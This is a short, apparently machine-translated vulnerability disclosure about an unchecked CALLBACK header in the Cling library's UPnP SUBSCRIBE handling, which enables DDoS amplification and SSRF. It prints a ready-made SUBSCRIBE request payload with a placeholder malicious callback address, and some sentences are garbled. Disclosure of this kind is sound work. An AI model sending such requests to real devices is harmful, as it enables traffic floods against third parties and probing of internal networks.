The Upnp protocol implemented in the latest version of cling has a flaw, and the CALLBACK parameter in the request header of the service's subscribe request is not checked, resulting in the attacker using this flaw to send malicious data to the device developed using cling, which causes the device to specify to the attacker. A large amount of data is sent from the IP address of the IP address to implement a DDOS attack; at the same time, the vulnerability can be used to implement an SSRF attack on the intranet.
Payload is

SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0